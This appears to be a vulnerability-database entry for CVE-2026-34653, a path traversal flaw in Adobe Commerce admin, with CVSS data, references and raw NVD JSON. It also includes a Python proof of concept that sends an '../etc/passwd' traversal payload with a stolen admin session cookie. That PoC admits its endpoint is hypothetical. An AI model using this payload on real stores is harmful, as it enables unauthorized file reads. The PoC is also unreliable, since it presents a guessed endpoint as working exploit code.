CVE-2026-34653

Description

Adobe Commerce versions 2.4.9-beta1, 2.4.8-p4, 2.4.7-p9, 2.4.6-p14, 2.4.5-p16, 2.4.4-p17 and earlier are affected by an Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal') vulnerability that could result in arbitrary file system read and write. An authenticated attacker with administrative privileges could exploit this vulnerability to read or write files outside the restricted directory. Exploitation of this issue does not require user interaction. Scope is changed.

CVSS Details

CVSS Score

8.7

Severity

HIGH

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:N

Configurations (Affected Products)

No configuration data available.

Adobe Commerce <= 2.4.9-beta1

Adobe Commerce <= 2.4.8-p4

Adobe Commerce <= 2.4.7-p9

Adobe Commerce <= 2.4.6-p14

Adobe Commerce <= 2.4.5-p16

Adobe Commerce <= 2.4.4-p17

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

import requests

# PoC for CVE-2026-34653 (Path Traversal in Adobe Commerce)
# This script demonstrates how an authenticated admin might read arbitrary files.

TARGET_URL = "https://target-adobe-commerce.com"
ADMIN_PATH = "/admin"  # Replace with actual admin path
SESSION_COOKIE = "admin_session_cookie_value" # Obtained after login

headers = {
    "Cookie": f"PHPSESSID={SESSION_COOKIE}",
    "User-Agent": "Mozilla/5.0 (PoC-Scanner)"
}

# Example vulnerable endpoint (Hypothetical based on advisory)
# The vulnerability allows reading files outside the restricted directory.
payload = {
    "filename": "../../../../../../../etc/passwd",
    "path": "var/import" # Intended restricted directory
}

try:
    response = requests.post(
        f"{TARGET_URL}{ADMIN_PATH}/vuln_endpoint/file/read", 
        data=payload, 
        headers=headers,
        verify=False
    )

    if response.status_code == 200 and "root:" in response.text:
        print("[+] Vulnerability Exploited Successfully!")
        print("[+] File Content:")
        print(response.text)
    else:
        print("[-] Exploit failed or target not vulnerable.")
        print(response.status_code)

except Exception as e:
    print(f"[!] Error: {e}")

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-34653
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-34653
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-34653/
[4] VulDB https://vuldb.com/cve/CVE-2026-34653
[5] https://helpx.adobe.com/security/products/magento/apsb26-49.html

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-34653", "sourceIdentifier": "[email protected]", "published": "2026-05-12T20:16:36.387", "lastModified": "2026-05-13T14:49:11.830", "vulnStatus": "Undergoing Analysis", "cveTags": [], "descriptions": [{"lang": "en", "value": "Adobe Commerce versions 2.4.9-beta1, 2.4.8-p4, 2.4.7-p9, 2.4.6-p14, 2.4.5-p16, 2.4.4-p17 and earlier are affected by an Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal') vulnerability that could result in arbitrary file system read and write. An authenticated attacker with administrative privileges could exploit this vulnerability to read or write files outside the restricted directory. Exploitation of this issue does not require user interaction. Scope is changed."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:N", "baseScore": 8.7, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.3, "impactScore": 5.8}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-22"}]}], "references": [{"url": "https://helpx.adobe.com/security/products/magento/apsb26-49.html", "source": "[email protected]"}]}}